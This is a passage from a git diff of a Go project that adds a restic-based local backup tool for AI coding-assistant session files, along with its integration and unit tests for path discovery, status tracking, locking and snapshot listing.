+ return nil, fmt.Errorf("restic returned no summary snapshot")
+ }
+
+ return result, nil
+}
+
+// checkRepoInitialized verifies the restic repository exists and is accessible.
+func checkRepoInitialized(ctx context.Context, repoPath, passwordFile string) error {
+ checkCtx, cancel := context.WithTimeout(ctx, ResticCommandTimeout)
+ defer cancel()
+
+ cmd := exec.CommandContext(checkCtx, "restic",
+ "-r", repoPath,
+ "--password-file", passwordFile,
+ "cat", "config")
+ cmd.Stdout = nil
+ cmd.Stderr = nil
+
+ return cmd.Run()
+}
+
+// updateStatus writes the backup status file for monitoring.
+func updateStatus(logger otelzap.LoggerWithCtx, statusFile string, result *BackupResult, toolsFound []string) {
+ if err := os.MkdirAll(filepath.Dir(statusFile), ResticDirPerm); err != nil {
+ logger.Warn("Failed to create status directory",
+ zap.String("path", filepath.Dir(statusFile)),
+ zap.Error(err))
+ return
+ }
+
+ // Read existing status
+ status := &BackupStatus{}
+ if data, err := os.ReadFile(statusFile); err == nil {
+ _ = json.Unmarshal(data, status)
+ }
+
+ now := time.Now().Format(time.RFC3339)
+ status.ToolsFound = toolsFound
+
+ if result != nil {
+ // Success
+ status.LastSuccess = now
+ status.LastSnapshotID = result.SnapshotID
+ status.BytesAdded = result.BytesAdded
+ status.SuccessCount++
+ if status.FirstBackup == "" {
+ status.FirstBackup = now
+ }
+ } else {
+ // Failure
+ status.LastFailure = now
+ status.FailureCount++
+ }
+
+ data, err := json.MarshalIndent(status, "", " ")
+ if err != nil {
+ logger.Warn("Failed to marshal status", zap.Error(err))
+ return
+ }
+
+ tmp := statusFile + ".tmp"
+ if err := os.WriteFile(tmp, data, StatusFilePerm); err != nil {
+ logger.Warn("Failed to write status file",
+ zap.String("path", statusFile),
+ zap.Error(err))
+ return
+ }
+
+ if err := os.Rename(tmp, statusFile); err != nil {
+ _ = os.Remove(tmp)
+ logger.Warn("Failed to atomically replace status file",
+ zap.String("path", statusFile),
+ zap.Error(err))
+ }
+}
+
+// expandHome replaces ~ with the home directory.
+func expandHome(path, homeDir string) string {
+ if strings.HasPrefix(path, "~/") {
+ return filepath.Join(homeDir, path[2:])
+ }
+ if path == "~" {
+ return homeDir
+ }
+ return path
+}
+
+// resolveHomeDir returns the home directory for a user.
+func resolveHomeDir(username string) (string, error) {
+ if username == "" {
+ home, err := os.UserHomeDir()
+ if err != nil {
+ return "", fmt.Errorf("could not determine home directory: %w", err)
+ }
+ return home, nil
+ }
+
+ if username == "root" {
+ return "/root", nil
+ }
+
+ if u, err := user.Lookup(username); err == nil && u.HomeDir != "" {
+ return u.HomeDir, nil
+ }
+
+ homeDir := filepath.Join("/home", username)
+ if _, err := os.Stat(homeDir); err != nil {
+ return "", fmt.Errorf("home directory not found for user %s at %s: %w", username, homeDir, err)
+ }
+
+ return homeDir, nil
+}
+
+func discoverSourcePath(logger otelzap.LoggerWithCtx, homeDir string, sp SourcePath) ([]string, bool) {
+ resolved := expandHome(sp.Path, homeDir)
+ info, err := os.Stat(resolved)
+ if err != nil {
+ if !os.IsNotExist(err) {
+ logger.Debug("Error checking path", zap.String("path", resolved), zap.Error(err))
+ }
+ return nil, true
+ }
+
+ if !info.IsDir() {
+ if shouldIncludeFile(resolved, sp.Includes, sp.Excludes) {
+ return []string{resolved}, false
+ }
+ return nil, true
+ }
+
+ if len(sp.Includes) == 0 {
+ entries, err := os.ReadDir(resolved)
+ if err != nil || len(entries) == 0 {
+ return nil, true
+ }
+ return []string{resolved}, false
+ }
+
+ matches := collectMatchingFiles(resolved, sp.Includes, sp.Excludes)
+ return matches, len(matches) == 0
+}
+
+func collectMatchingFiles(root string, includes, excludes []string) []string {
+ var out []string
+ _ = filepath.WalkDir(root, func(path string, d os.DirEntry, err error) error {
+ if err != nil {
+ return nil
+ }
+
+ if d.IsDir() {
+ if path != root && pathMatchAny(d.Name(), excludes) {
+ return filepath.SkipDir
+ }
+ return nil
+ }
+
+ rel, relErr := filepath.Rel(root, path)
+ if relErr != nil {
+ return nil
+ }
+
+ if !shouldIncludeFile(rel, includes, excludes) {
+ return nil
+ }
+
+ out = append(out, path)
+ return nil
+ })
+
+ sort.Strings(out)
+ return out
+}
+
+func shouldIncludeFile(path string, includes, excludes []string) bool {
+ if pathMatchAny(path, excludes) {
+ return false
+ }
+
+ if len(includes) == 0 {
+ return true
+ }
+
+ return pathMatchAny(path, includes)
+}
+
+func pathMatchAny(path string, patterns []string) bool {
+ base := filepath.Base(path)
+ for _, pattern := range patterns {
+ if pattern == path || pattern == base {
+ return true
+ }
+
+ if ok, err := filepath.Match(pattern, base); err == nil && ok {
+ return true
+ }
+ if ok, err := filepath.Match(pattern, path); err == nil && ok {
+ return true
+ }
+ }
+ return false
+}
+
+func acquireBackupLock(lockFile string) (*os.File, error) {
+ if err := os.MkdirAll(filepath.Dir(lockFile), ResticDirPerm); err != nil {
+ return nil, fmt.Errorf("create lock directory: %w", err)
+ }
+
+ f, err := os.OpenFile(lockFile, os.O_CREATE|os.O_RDWR, 0600)
+ if err != nil {
+ return nil, fmt.Errorf("open lock file: %w", err)
+ }
+
+ if err := syscall.Flock(int(f.Fd()), syscall.LOCK_EX|syscall.LOCK_NB); err != nil {
+ _ = f.Close()
+ return nil, fmt.Errorf("%w: another backup is already running", ErrBackupAlreadyRunning)
+ }
+
+ return f, nil
+}
+
+func releaseBackupLock(f *os.File) {
+ if f == nil {
+ return
+ }
+ _ = syscall.Flock(int(f.Fd()), syscall.LOCK_UN)
+ _ = f.Close()
+}
+
+// ListSnapshots lists chat-archive snapshots from the restic repository.
+func ListSnapshots(rc *eos_io.RuntimeContext, config BackupConfig) (string, error) {
+ homeDir := config.HomeDir
+ if homeDir == "" {
+ var err error
+ homeDir, err = resolveHomeDir(config.User)
+ if err != nil {
+ return "", &opError{
+ Op: "resolve home directory",
+ Err: fmt.Errorf("user %q: %w", config.User, err),
+ }
+ }
+ }
+
+ repoPath := filepath.Join(homeDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(homeDir, ResticPasswordSubdir)
+
+ if _, err := exec.LookPath("restic"); err != nil {
+ return "", &opError{
+ Op: "check restic installation",
+ Err: fmt.Errorf("%w", ErrResticNotInstalled),
+ }
+ }
+
+ if err := checkRepoInitialized(rc.Ctx, repoPath, passwordFile); err != nil {
+ return "", &opError{
+ Op: "check repository initialization",
+ Err: fmt.Errorf("%w at %s: %v", ErrRepositoryNotInitialized, repoPath, err),
+ }
+ }
+
+ listCtx, cancel := context.WithTimeout(rc.Ctx, ResticCommandTimeout)
+ defer cancel()
+
+ cmd := exec.CommandContext(listCtx, "restic", //nolint:gosec // args are validated constants and paths
+ "-r", repoPath,
+ "--password-file", passwordFile,
+ "snapshots",
+ "--tag", BackupTag,
+ )
+ output, err := cmd.CombinedOutput()
+ if err != nil {
+ if errors.Is(listCtx.Err(), context.DeadlineExceeded) {
+ return "", fmt.Errorf("list snapshots timed out after %s", ResticCommandTimeout)
+ }
+ return "", fmt.Errorf("failed to list snapshots: %w\n%s", err, strings.TrimSpace(string(output)))
+ }
+
+ return string(output), nil
+}
diff --git a/pkg/chatbackup/backup_integration_test.go b/pkg/chatbackup/backup_integration_test.go
new file mode 100644
index 000000000..7f4cb2206
--- /dev/null
+++ b/pkg/chatbackup/backup_integration_test.go
@@ -0,0 +1,298 @@
+//go:build integration
+
+package chatbackup
+
+import (
+ "context"
+ "encoding/json"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/stretchr/testify/assert"
+ "github.com/stretchr/testify/require"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Integration Tests - Require restic binary on PATH
+// Run with: go test -tags integration ./pkg/chatbackup/...
+// ═══════════════════════════════════════════════════════════════════════════
+
+func requireRestic(t *testing.T) {
+ t.Helper()
+ if _, err := exec.LookPath("restic"); err != nil {
+ t.Skip("restic not installed, skipping integration test")
+ }
+}
+
+func newTestRC(t *testing.T) *eos_io.RuntimeContext {
+ t.Helper()
+ return eos_io.NewContext(context.Background(), "test")
+}
+
+func TestIntegration_Setup_CreatesRepo(t *testing.T) {
+ requireRestic(t)
+
+ tmpDir := t.TempDir()
+
+ // Create a fake home directory with Claude data
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(
+ filepath.Join(claudeDir, "test-session.jsonl"),
+ []byte(`{"type":"user","message":"hello"}`+"\n"),
+ 0644))
+
+ rc := newTestRC(t)
+
+ // Override the user's home for this test
+ config := ScheduleConfig{
+ BackupConfig: BackupConfig{
+ User: "",
+ HomeDir: tmpDir,
+ ExtraScanDirs: []string{},
+ Retention: DefaultRetentionPolicy(),
+ },
+ BackupCron: DefaultBackupCron,
+ PruneCron: DefaultPruneCron,
+ }
+
+ // We can't run the full Setup because it uses resolveHomeDir
+ // Instead, test the individual steps
+
+ // Test initRepo
+ repoPath := filepath.Join(tmpDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmpDir, ResticPasswordSubdir)
+
+ // Generate password
+ err := generatePassword(passwordFile)
+ require.NoError(t, err)
+
+ // Verify password file exists with correct permissions
+ info, err := os.Stat(passwordFile)
+ require.NoError(t, err)
+ assert.Equal(t, PasswordFilePerm, info.Mode().Perm(),
+ "password file should have 0400 permissions")
+
+ // Read password and verify length
+ password, err := os.ReadFile(passwordFile)
+ require.NoError(t, err)
+ assert.GreaterOrEqual(t, len(password), PasswordLength,
+ "password should be at least %d characters", PasswordLength)
+
+ // Test initRepo
+ err = initRepo(rc, repoPath, passwordFile)
+ require.NoError(t, err)
+
+ // Verify repo initialized (idempotent check)
+ err = checkRepoInitialized(rc.Ctx, repoPath, passwordFile)
+ require.NoError(t, err, "repo should be initialized")
+
+ // Test idempotent re-init
+ err = initRepo(rc, repoPath, passwordFile)
+ require.NoError(t, err, "re-init should succeed (idempotent)")
+
+ _ = config // Use config to avoid lint
+}
+
+func TestIntegration_Backup_CreatesSnapshot(t *testing.T) {
+ requireRestic(t)
+
+ tmpDir := t.TempDir()
+
+ // Create test data
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(
+ filepath.Join(claudeDir, "session1.jsonl"),
+ []byte(`{"type":"user","message":"test message"}`+"\n"),
+ 0644))
+
+ // Set up restic
+ repoPath := filepath.Join(tmpDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmpDir, ResticPasswordSubdir)
+
+ require.NoError(t, generatePassword(passwordFile))
+
+ rc := newTestRC(t)
+ require.NoError(t, initRepo(rc, repoPath, passwordFile))
+
+ // Run backup directly (bypass resolveHomeDir)
+ logger := newSilentLogger()
+ registry := []ToolSource{
+ {
+ Name: "claude-code",
+ Description: "Test",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/projects",
+ Description: "Projects",
+ },
+ },
+ },
+ }
+
+ paths, toolsFound, _ := discoverPaths(logger, registry, tmpDir)
+ require.NotEmpty(t, paths, "should discover Claude data")
+ require.Contains(t, toolsFound, "claude-code")
+
+ result, err := runResticBackup(rc.Ctx, logger, repoPath, passwordFile, paths)
+ require.NoError(t, err)
+
+ assert.NotEmpty(t, result.SnapshotID, "should create a snapshot")
+ assert.Greater(t, result.FilesNew, 0, "should have new files")
+}
+
+func TestIntegration_Backup_StatusFileUpdated(t *testing.T) {
+ requireRestic(t)
+
+ tmpDir := t.TempDir()
+
+ // Create test data
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(
+ filepath.Join(claudeDir, "session1.jsonl"),
+ []byte(`{"type":"user","message":"test"}`+"\n"),
+ 0644))
+
+ repoPath := filepath.Join(tmpDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmpDir, ResticPasswordSubdir)
+ statusFile := filepath.Join(tmpDir, ResticStatusSubdir)
+
+ require.NoError(t, generatePassword(passwordFile))
+
+ rc := newTestRC(t)
+ require.NoError(t, initRepo(rc, repoPath, passwordFile))
+
+ logger := newSilentLogger()
+ paths := []string{claudeDir}
+
+ result, err := runResticBackup(rc.Ctx, logger, repoPath, passwordFile, paths)
+ require.NoError(t, err)
+
+ // Update status
+ updateStatus(logger, statusFile, result, []string{"claude-code"})
+
+ // Verify status file
+ data, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+
+ var status BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status))
+
+ assert.NotEmpty(t, status.LastSuccess)
+ assert.NotEmpty(t, status.LastSnapshotID)
+ assert.Equal(t, 1, status.SuccessCount)
+ assert.Contains(t, status.ToolsFound, "claude-code")
+}
+
+func TestIntegration_Backup_Idempotent(t *testing.T) {
+ requireRestic(t)
+
+ tmpDir := t.TempDir()
+
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(
+ filepath.Join(claudeDir, "session.jsonl"),
+ []byte(`{"test": true}`+"\n"),
+ 0644))
+
+ repoPath := filepath.Join(tmpDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmpDir, ResticPasswordSubdir)
+
+ require.NoError(t, generatePassword(passwordFile))
+
+ rc := newTestRC(t)
+ require.NoError(t, initRepo(rc, repoPath, passwordFile))
+
+ logger := newSilentLogger()
+ paths := []string{claudeDir}
+
+ // First backup
+ result1, err := runResticBackup(rc.Ctx, logger, repoPath, passwordFile, paths)
+ require.NoError(t, err)
+ assert.Greater(t, result1.FilesNew, 0)
+
+ // Second backup (no changes) - should succeed with 0 new files
+ result2, err := runResticBackup(rc.Ctx, logger, repoPath, passwordFile, paths)
+ require.NoError(t, err)
+ assert.Equal(t, 0, result2.FilesNew,
+ "second backup should have 0 new files (nothing changed)")
+ assert.Greater(t, result2.FilesUnmodified, 0,
+ "second backup should have unmodified files")
+}
+
+func TestIntegration_Prune_Works(t *testing.T) {
+ requireRestic(t)
+
+ tmpDir := t.TempDir()
+
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(
+ filepath.Join(claudeDir, "session.jsonl"),
+ []byte(`{"test": true}`+"\n"),
+ 0644))
+
+ repoPath := filepath.Join(tmpDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmpDir, ResticPasswordSubdir)
+
+ require.NoError(t, generatePassword(passwordFile))
+
+ rc := newTestRC(t)
+ require.NoError(t, initRepo(rc, repoPath, passwordFile))
+
+ logger := newSilentLogger()
+
+ // Create a snapshot first
+ _, err := runResticBackup(rc.Ctx, logger, repoPath, passwordFile, []string{claudeDir})
+ require.NoError(t, err)
+
+ // Prune should succeed (even with nothing to prune)
+ args := []string{
+ "-r", repoPath,
+ "--password-file", passwordFile,
+ "forget",
+ "--tag", BackupTag,
+ "--keep-within", "48h",
+ "--keep-hourly", "24",
+ "--keep-daily", "7",
+ "--keep-weekly", "4",
+ "--keep-monthly", "12",
+ "--prune",
+ }
+
+ cmd := exec.CommandContext(rc.Ctx, "restic", args...)
+ output, err := cmd.CombinedOutput()
+ assert.NoError(t, err, "prune should succeed. Output: %s", string(output))
+}
+
+func TestIntegration_ListSnapshots_Works(t *testing.T) {
+ requireRestic(t)
+
+ tmpDir := t.TempDir()
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(
+ filepath.Join(claudeDir, "session.jsonl"),
+ []byte(`{"test": true}`+"\n"),
+ 0644))
+
+ repoPath := filepath.Join(tmpDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmpDir, ResticPasswordSubdir)
+ require.NoError(t, generatePassword(passwordFile))
+
+ rc := newTestRC(t)
+ require.NoError(t, initRepo(rc, repoPath, passwordFile))
+
+ _, err := runResticBackup(rc.Ctx, newSilentLogger(), repoPath, passwordFile, []string{claudeDir})
+ require.NoError(t, err)
+
+ output, err := ListSnapshots(rc, BackupConfig{HomeDir: tmpDir})
+ require.NoError(t, err)
+ assert.Contains(t, output, "ID")
+}
diff --git a/pkg/chatbackup/backup_test.go b/pkg/chatbackup/backup_test.go
new file mode 100644
index 000000000..04f775cba
--- /dev/null
+++ b/pkg/chatbackup/backup_test.go
@@ -0,0 +1,472 @@
+package chatbackup
+
+import (
+ "encoding/json"
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+ "github.com/stretchr/testify/require"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// expandHome Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestExpandHome_TildeSlash(t *testing.T) {
+ result := expandHome("~/.claude/projects", "/home/testuser")
+ assert.Equal(t, "/home/testuser/.claude/projects", result)
+}
+
+func TestExpandHome_TildeOnly(t *testing.T) {
+ result := expandHome("~", "/home/testuser")
+ assert.Equal(t, "/home/testuser", result)
+}
+
+func TestExpandHome_AbsolutePath(t *testing.T) {
+ result := expandHome("/etc/config", "/home/testuser")
+ assert.Equal(t, "/etc/config", result)
+}
+
+func TestExpandHome_RelativePath(t *testing.T) {
+ result := expandHome("relative/path", "/home/testuser")
+ assert.Equal(t, "relative/path", result)
+}
+
+func TestExpandHome_NestedTilde(t *testing.T) {
+ result := expandHome("~/.config/Code/User/settings.json", "/home/testuser")
+ assert.Equal(t, "/home/testuser/.config/Code/User/settings.json", result)
+}
+
+func TestExpandHome_EmptyHome(t *testing.T) {
+ // With empty homeDir, filepath.Join("", "test") = "test"
+ result := expandHome("~/test", "")
+ assert.Equal(t, "test", result)
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// resolveHomeDir Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestResolveHomeDir_Root(t *testing.T) {
+ home, err := resolveHomeDir("root")
+ require.NoError(t, err)
+ assert.Equal(t, "/root", home)
+}
+
+func TestResolveHomeDir_Empty(t *testing.T) {
+ // Empty username should resolve to current user's home
+ home, err := resolveHomeDir("")
+ require.NoError(t, err)
+ assert.NotEmpty(t, home)
+}
+
+func TestResolveHomeDir_NonexistentUser(t *testing.T) {
+ _, err := resolveHomeDir("nonexistent_user_xyz_12345")
+ assert.Error(t, err)
+ assert.Contains(t, err.Error(), "home directory not found")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// discoverPaths Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDiscoverPaths_EmptyRegistry(t *testing.T) {
+ logger := newSilentLogger()
+ paths, tools, skipped := discoverPaths(logger, []ToolSource{}, "/tmp/nonexistent")
+ assert.Empty(t, paths)
+ assert.Empty(t, tools)
+ assert.Empty(t, skipped)
+}
+
+func TestDiscoverPaths_NonexistentPaths(t *testing.T) {
+ logger := newSilentLogger()
+ registry := []ToolSource{
+ {
+ Name: "test-tool",
+ Description: "Test tool",
+ Paths: []SourcePath{
+ {
+ Path: "~/.nonexistent-tool/sessions",
+ Description: "Sessions",
+ },
+ },
+ },
+ }
+
+ paths, tools, skipped := discoverPaths(logger, registry, "/tmp/test-home-nonexistent")
+ assert.Empty(t, paths, "should not include nonexistent paths")
+ assert.Empty(t, tools, "should not report tool if no data found")
+ assert.NotEmpty(t, skipped, "should report skipped paths")
+}
+
+func TestDiscoverPaths_ExistingDirectory(t *testing.T) {
+ // Create a temporary directory structure simulating Claude Code data
+ tmpDir := t.TempDir()
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+
+ // Create a session file so the directory isn't empty
+ testFile := filepath.Join(claudeDir, "test-session.jsonl")
+ require.NoError(t, os.WriteFile(testFile, []byte(`{"test": true}`), 0644))
+
+ logger := newSilentLogger()
+ registry := []ToolSource{
+ {
+ Name: "test-tool",
+ Description: "Test tool",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/projects",
+ Description: "Projects",
+ },
+ },
+ },
+ }
+
+ paths, tools, _ := discoverPaths(logger, registry, tmpDir)
+ assert.Len(t, paths, 1, "should include existing directory")
+ assert.Equal(t, claudeDir, paths[0])
+ assert.Contains(t, tools, "test-tool")
+}
+
+func TestDiscoverPaths_EmptyDirectory(t *testing.T) {
+ tmpDir := t.TempDir()
+ emptyDir := filepath.Join(tmpDir, ".claude", "empty")
+ require.NoError(t, os.MkdirAll(emptyDir, 0755))
+
+ logger := newSilentLogger()
+ registry := []ToolSource{
+ {
+ Name: "test-tool",
+ Description: "Test tool",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/empty",
+ Description: "Empty dir",
+ },
+ },
+ },
+ }
+
+ paths, tools, skipped := discoverPaths(logger, registry, tmpDir)
+ assert.Empty(t, paths, "should not include empty directories")
+ assert.Empty(t, tools)
+ assert.NotEmpty(t, skipped, "empty dirs should be skipped")
+}
+
+func TestDiscoverPaths_FileNotDirectory(t *testing.T) {
+ tmpDir := t.TempDir()
+
+ // Create a file (not directory)
+ settingsFile := filepath.Join(tmpDir, ".claude", "settings.json")
+ require.NoError(t, os.MkdirAll(filepath.Dir(settingsFile), 0755))
+ require.NoError(t, os.WriteFile(settingsFile, []byte(`{}`), 0644))
+
+ logger := newSilentLogger()
+ registry := []ToolSource{
+ {
+ Name: "test-tool",
+ Description: "Test tool",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/settings.json",
+ Description: "Settings",
+ },
+ },
+ },
+ }
+
+ paths, tools, _ := discoverPaths(logger, registry, tmpDir)
+ assert.Len(t, paths, 1, "should include existing files")
+ assert.Equal(t, settingsFile, paths[0])
+ assert.Contains(t, tools, "test-tool")
+}
+
+func TestDiscoverPaths_Deduplication(t *testing.T) {
+ tmpDir := t.TempDir()
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(claudeDir, "test.jsonl"), []byte(`{}`), 0644))
+
+ logger := newSilentLogger()
+
+ // Two tools referencing the same path
+ registry := []ToolSource{
+ {
+ Name: "tool-a",
+ Description: "Tool A",
+ Paths: []SourcePath{
+ {Path: "~/.claude/projects", Description: "Projects"},
+ },
+ },
+ {
+ Name: "tool-b",
+ Description: "Tool B",
+ Paths: []SourcePath{
+ {Path: "~/.claude/projects", Description: "Also projects"},
+ },
+ },
+ }
+
+ paths, _, _ := discoverPaths(logger, registry, tmpDir)
+ assert.Len(t, paths, 1, "should deduplicate identical paths")
+}
+
+func TestDiscoverPaths_MultipleTools(t *testing.T) {
+ tmpDir := t.TempDir()
+
+ // Create Claude data
+ claudeDir := filepath.Join(tmpDir, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(claudeDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(claudeDir, "session.jsonl"), []byte(`{}`), 0644))
+
+ // Create Codex data
+ codexDir := filepath.Join(tmpDir, ".codex", "sessions")
+ require.NoError(t, os.MkdirAll(codexDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(codexDir, "session.jsonl"), []byte(`{}`), 0644))
+
+ logger := newSilentLogger()
+ registry := []ToolSource{
+ {
+ Name: "claude-code",
+ Description: "Claude",
+ Paths: []SourcePath{
+ {Path: "~/.claude/projects", Description: "Projects"},
+ },
+ },
+ {
+ Name: "codex",
+ Description: "Codex",
+ Paths: []SourcePath{
+ {Path: "~/.codex/sessions", Description: "Sessions"},
+ },
+ },
+ }
+
+ paths, tools, _ := discoverPaths(logger, registry, tmpDir)
+ assert.Len(t, paths, 2)
+ assert.Contains(t, tools, "claude-code")
+ assert.Contains(t, tools, "codex")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// discoverProjectContext Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDiscoverProjectContext_EmptyScanDirs(t *testing.T) {
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{})
+ assert.Empty(t, paths)
+}
+
+func TestDiscoverProjectContext_NonexistentDir(t *testing.T) {
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{"/tmp/nonexistent-xyz-12345"})
+ assert.Empty(t, paths)
+}
+
+func TestDiscoverProjectContext_FindsClaudeMd(t *testing.T) {
+ tmpDir := t.TempDir()
+ projectDir := filepath.Join(tmpDir, "myproject")
+ require.NoError(t, os.MkdirAll(projectDir, 0755))
+
+ claudeMd := filepath.Join(projectDir, "CLAUDE.md")
+ require.NoError(t, os.WriteFile(claudeMd, []byte("# Claude instructions"), 0644))
+
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{tmpDir})
+ assert.Contains(t, paths, claudeMd)
+}
+
+func TestDiscoverProjectContext_FindsAgentsMd(t *testing.T) {
+ tmpDir := t.TempDir()
+ projectDir := filepath.Join(tmpDir, "myproject")
+ require.NoError(t, os.MkdirAll(projectDir, 0755))
+
+ agentsMd := filepath.Join(projectDir, "AGENTS.md")
+ require.NoError(t, os.WriteFile(agentsMd, []byte("# Agents"), 0644))
+
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{tmpDir})
+ assert.Contains(t, paths, agentsMd)
+}
+
+func TestDiscoverProjectContext_FindsClaudeDir(t *testing.T) {
+ tmpDir := t.TempDir()
+ projectDir := filepath.Join(tmpDir, "myproject", ".claude")
+ require.NoError(t, os.MkdirAll(projectDir, 0755))
+
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{tmpDir})
+ assert.Contains(t, paths, projectDir)
+}
+
+func TestDiscoverProjectContext_SkipsGitDir(t *testing.T) {
+ tmpDir := t.TempDir()
+ gitDir := filepath.Join(tmpDir, "myproject", ".git")
+ require.NoError(t, os.MkdirAll(gitDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(gitDir, "CLAUDE.md"), []byte("# nope"), 0644))
+
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{tmpDir})
+ // Should NOT find CLAUDE.md inside .git/
+ for _, p := range paths {
+ assert.NotContains(t, p, ".git",
+ "should not include files inside .git/")
+ }
+}
+
+func TestDiscoverProjectContext_SkipsNodeModules(t *testing.T) {
+ tmpDir := t.TempDir()
+ nmDir := filepath.Join(tmpDir, "myproject", "node_modules", "pkg")
+ require.NoError(t, os.MkdirAll(nmDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(nmDir, "CLAUDE.md"), []byte("# nope"), 0644))
+
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{tmpDir})
+ for _, p := range paths {
+ assert.NotContains(t, p, "node_modules",
+ "should not include files inside node_modules/")
+ }
+}
+
+func TestDiscoverProjectContext_DepthLimit(t *testing.T) {
+ tmpDir := t.TempDir()
+ // Create deeply nested CLAUDE.md (depth 6 - should be excluded)
+ deepDir := filepath.Join(tmpDir, "a", "b", "c", "d", "e")
+ require.NoError(t, os.MkdirAll(deepDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(deepDir, "CLAUDE.md"), []byte("# deep"), 0644))
+
+ // Create shallow CLAUDE.md (depth 1 - should be included)
+ shallowDir := filepath.Join(tmpDir, "shallow")
+ require.NoError(t, os.MkdirAll(shallowDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(shallowDir, "CLAUDE.md"), []byte("# shallow"), 0644))
+
+ logger := newSilentLogger()
+ paths := discoverProjectContext(logger, []string{tmpDir})
+
+ shallowMd := filepath.Join(shallowDir, "CLAUDE.md")
+ assert.Contains(t, paths, shallowMd, "should include shallow CLAUDE.md")
+}
+
+func TestDiscoverProjectContext_Deduplication(t *testing.T) {
+ tmpDir := t.TempDir()
+ projectDir := filepath.Join(tmpDir, "myproject")
+ require.NoError(t, os.MkdirAll(projectDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(projectDir, "CLAUDE.md"), []byte("# Claude"), 0644))
+
+ logger := newSilentLogger()
+ // Scan the same dir twice
+ paths := discoverProjectContext(logger, []string{tmpDir, tmpDir})
+
+ // Count occurrences
+ claudeMd := filepath.Join(projectDir, "CLAUDE.md")
+ count := 0
+ for _, p := range paths {
+ if p == claudeMd {
+ count++
+ }
+ }
+ assert.Equal(t, 1, count, "should deduplicate paths across scan dirs")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// updateStatus Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestUpdateStatus_Success(t *testing.T) {
+ tmpDir := t.TempDir()
+ statusFile := filepath.Join(tmpDir, "status.json")
+ logger := newSilentLogger()
+
+ result := &BackupResult{
+ SnapshotID: "abc123",
+ BytesAdded: 1024,
+ }
+
+ updateStatus(logger, statusFile, result, []string{"claude-code"})
+
+ // Read and verify
+ data, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+
+ var status BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status))
+
+ assert.NotEmpty(t, status.LastSuccess)
+ assert.Equal(t, "abc123", status.LastSnapshotID)
+ assert.Equal(t, int64(1024), status.BytesAdded)
+ assert.Equal(t, 1, status.SuccessCount)
+ assert.NotEmpty(t, status.FirstBackup)
+ assert.Contains(t, status.ToolsFound, "claude-code")
+}
+
+func TestUpdateStatus_Failure(t *testing.T) {
+ tmpDir := t.TempDir()
+ statusFile := filepath.Join(tmpDir, "status.json")
+ logger := newSilentLogger()
+
+ updateStatus(logger, statusFile, nil, []string{"claude-code"})
+
+ data, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+
+ var status BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status))
+
+ assert.NotEmpty(t, status.LastFailure)
+ assert.Equal(t, 1, status.FailureCount)
+ assert.Empty(t, status.LastSuccess, "success should not be set on failure")
+}
+
